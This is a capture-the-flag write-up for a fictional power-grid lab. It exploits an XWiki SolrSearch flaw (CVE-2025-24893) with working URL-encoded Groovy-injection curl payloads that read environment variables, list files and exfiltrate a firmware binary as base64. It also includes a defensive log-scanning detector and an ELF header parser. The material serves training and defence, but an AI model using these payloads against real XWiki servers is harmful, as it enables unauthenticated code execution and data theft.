
Chapter 2: The Vendor


🧠 Challenge Text

Hi, emergency troubleshooter,

recent studies suggest that the intense heat and hard labor of solar technicians often trigger strange, vivid dreams about the future of energetics. Over the past few days, technicians have woken up night after night with the same terrifying screams "Look, up in the sky! It’s a bird! It’s a plane! It’s Superman! Let’s roast it anyway!".

Find out what's going on; we need our technicians to stay sane.

Stay grounded!

  • http://intro.falcon.powergrid.tcc/

🔍 Hints Text

1. Be sure you enter the flag for the correct chapter.
2. In this realm, challenges should be conquered in a precise order, and to triumph over some, you'll need artifacts acquired from others - a unique twist that defies the norms of typical CTF challenges.
3. The chapter haiku will lead you.

🎨 Solution

On the vendor page, a Solr search box can be found at http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch. Let's test a command injection that prints the environment (printenv) through it.

$ curl -s "http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22printenv%20FLAG%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" | grep FLAG | grep -oE '({.{4}-.{4}-.{4}-.{4}\})'
{gwNd-0Klr-lsMW-YgZU}
{gwNd-0Klr-lsMW-YgZU}

CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source enterprise wiki platform. The search term passed in the SolrSearch text parameter ends up rendered as wiki syntax in the RSS output, which is what lets the {{groovy}} macro above execute on the server.
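To turn this into something a defender can act on, here is an added example (not part of the original write-up or of XWiki) in Python that scans access log lines for SolrSearch requests whose decoded text parameter carries XWiki macro syntax of the kind shown above. The log lines, addresses and timestamps are constructed for the example; the pattern also unmasks double URL-encoded payloads, which a single decode would miss.

```python
"""Flag XWiki SolrSearch requests that carry wiki macro syntax.

Added example for this write-up, not part of the original page or of XWiki.
It scans access log lines in common log format for requests to the
SolrSearch page whose ``text`` parameter, once URL-decoded, contains macro
markup ({{groovy}}, {{async ...}}, or the }}} break-out sequence) of the kind
used against CVE-2025-24893. All log lines, addresses and timestamps below
are constructed for the example.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access log (common log format).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=solar%20panel HTTP/1.1" 200 1532
10.0.0.9 - - [01/Jan/2025:10:00:07 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(1)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 2210
10.0.0.7 - - [01/Jan/2025:10:00:09 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2025:10:00:15 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=%257b%257bgroovy%257d%257d HTTP/1.1" 200 2210
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Macro open/close for the scripting macros plus the }}} sequence that closes
# an enclosing verbatim block; none of these belong in a legitimate search term.
MACRO_PATTERN = re.compile(r"\{\{/?(?:groovy|async|velocity|script)\b|\}\}\}", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are unmasked as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_macro_injections(log_text):
    """Return (ip, timestamp, decoded_text) for each SolrSearch request carrying macro syntax."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if not url.path.endswith("/SolrSearch"):
            continue
        # parse_qs performs one round of decoding; decode_fully handles the rest.
        for raw in parse_qs(url.query, keep_blank_values=True).get("text", []):
            text = decode_fully(raw)
            if MACRO_PATTERN.search(text):
                hits.append((m.group("ip"), m.group("ts"), text))
    return hits


if __name__ == "__main__":
    for ip, ts, text in find_macro_injections(SAMPLE_LOG):
        print(f"{ts} {ip} macro injection in SolrSearch text: {text!r}")
```

Run against real logs by feeding the file contents to find_macro_injections; a hit on a host that has not been upgraded to a patched XWiki release is worth treating as a probable compromise, since the payload runs unauthenticated. The same pattern applies to other wiki-rendered parameters, but the SolrSearch path is the one this chapter exercises.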

From the chapter haiku we can deduce that a firmware image sits on the server (important for the next challenge). A TCP reverse shell was not helpful here, so instead we search the filesystem for the firmware executable through the same injection.

$ python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))" '}}}{{async async=false}} {{groovy}}
println("find / -maxdepth 3 -name *firmware* -print".execute().text)
{{/groovy}} {{/async}}'

$ curl "http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%20%7B%7Bgroovy%7D%7D%0Aprintln%28%22find%20/%20-maxdepth%203%20-name%20%2Afirmware%2A%20-print%22.execute%28%29.text%29%0A%7B%7B/groovy%7D%7D%20%7B%7B/async%7D%7D" | xq

    <description>RSS feed for search on [}}} /sys/class/firmware
/sys/firmware
/sys/module/firmware_class
/usr/lib/firmware
/data/firmware
/data/firmware/roostguard-firmware-0.9.bin ]</description>
    <language>en</language>
    <copyright />
    <dc:creator>XWiki</dc:creator>
    <dc:language>en</dc:language>
    <dc:rights />
  </channel>
</rss>

Now we need to download the contents of the executable /data/firmware/roostguard-firmware-0.9.bin. The only channel back is the RSS response, so the binary is base64-encoded on the server and reconstructed locally.

$ python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))" '}}}{{async async=false}} {{groovy}}
println("base64 /data/firmware/roostguard-firmware-0.9.bin".execute().text)
{{/groovy}} {{/async}}'

$ curl "http://thevendor.falcon.powergrid.tcc/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%20%7B%7Bgroovy%7D%7D%0Aprintln%28%22base64%20/data/firmware/roostguard-firmware-0.9.bin%22.execute%28%29.text%29%0A%7B%7B/groovy%7D%7D%20%7B%7B/async%7D%7D" | sed 's|</\?em>|++|g' | xq > test.html

$ touch test.b64
$ # the base64 text from the <description> element in test.html goes into test.b64 before decoding
$ base64 -d test.b64 > roostguard-firmware-0.9.bin
$ chmod +x roostguard-firmware-0.9.bin

$ file ./roostguard-firmware-0.9.bin
./roostguard-firmware-0.9.bin: ELF 32-bit LSB executable, Atmel AVR 8-bit, version 1 (SYSV), statically linked, with debug_info, not stripped
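The file output above identifies the recovered blob from its ELF header. As an added example that is not part of the original write-up, the Python below parses those header fields itself (class, byte order, OS ABI, object type and machine) so the identification can be checked without relying on file(1). The sample header bytes are constructed, and the machine table is a small subset of the ELF e_machine values (EM_AVR is 83). Static linking and debug info, which file also reports, come from section and dynamic data beyond the header and are not covered here.

```python
"""Identify a recovered firmware image from its ELF header.

Added example (not from the original write-up): parses the ELF identification
bytes and the e_type/e_machine fields the way file(1) does, so a recovered
blob can be confirmed as an AVR executable before further analysis. The
header bytes in SAMPLE_AVR_HEADER are constructed for the example.
"""
import struct

ELF_MAGIC = b"\x7fELF"
ELF_CLASS = {1: "ELF 32-bit", 2: "ELF 64-bit"}
ELF_DATA = {1: "LSB", 2: "MSB"}
ELF_OSABI = {0: "SYSV", 3: "GNU/Linux"}
ELF_TYPE = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}
# Subset of e_machine values from the ELF specification.
ELF_MACHINE = {
    3: "Intel 80386",
    40: "ARM",
    62: "x86-64",
    83: "Atmel AVR 8-bit",
    183: "AArch64",
    243: "RISC-V",
}


def parse_elf_header(data):
    """Return a dict describing the ELF header, or raise ValueError if it is not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    ei_class, ei_data, ei_version, ei_osabi = data[4], data[5], data[6], data[7]
    if ei_class not in ELF_CLASS or ei_data not in ELF_DATA:
        raise ValueError("invalid ELF class or data encoding")
    # e_type and e_machine follow the 16-byte e_ident and use the file's own byte order.
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "class": ELF_CLASS[ei_class],
        "data": ELF_DATA[ei_data],
        "version": ei_version,
        "osabi": ELF_OSABI.get(ei_osabi, f"unknown ABI {ei_osabi}"),
        "type": ELF_TYPE.get(e_type, f"unknown type {e_type}"),
        "machine": ELF_MACHINE.get(e_machine, f"unknown machine {e_machine}"),
    }


def describe(data):
    """One-line summary in the spirit of file(1)."""
    h = parse_elf_header(data)
    return f"{h['class']} {h['data']} {h['type']}, {h['machine']}, version {h['version']} ({h['osabi']})"


def identify_file(path):
    """Read the 52-byte ELF32 header (enough for ELF64 identification too) and describe it."""
    with open(path, "rb") as fh:
        return describe(fh.read(52))


# Constructed 52-byte ELF32 header: 32-bit, little-endian, SYSV, EXEC, EM_AVR (83).
SAMPLE_AVR_HEADER = (
    ELF_MAGIC + bytes([1, 1, 1, 0]) + bytes(8)  # e_ident with padding
    + struct.pack("<HHIIIIIHHHHHH", 2, 83, 1, 0, 0x34, 0, 0, 52, 32, 0, 40, 0, 0)
)

if __name__ == "__main__":
    print(describe(SAMPLE_AVR_HEADER))
```

Calling identify_file on the recovered roostguard-firmware-0.9.bin should report the same class, byte order, type and machine that file printed above; a mismatch would mean the base64 transfer was corrupted (for instance by the wiki rendering altering characters) and the blob should be re-fetched before any further work.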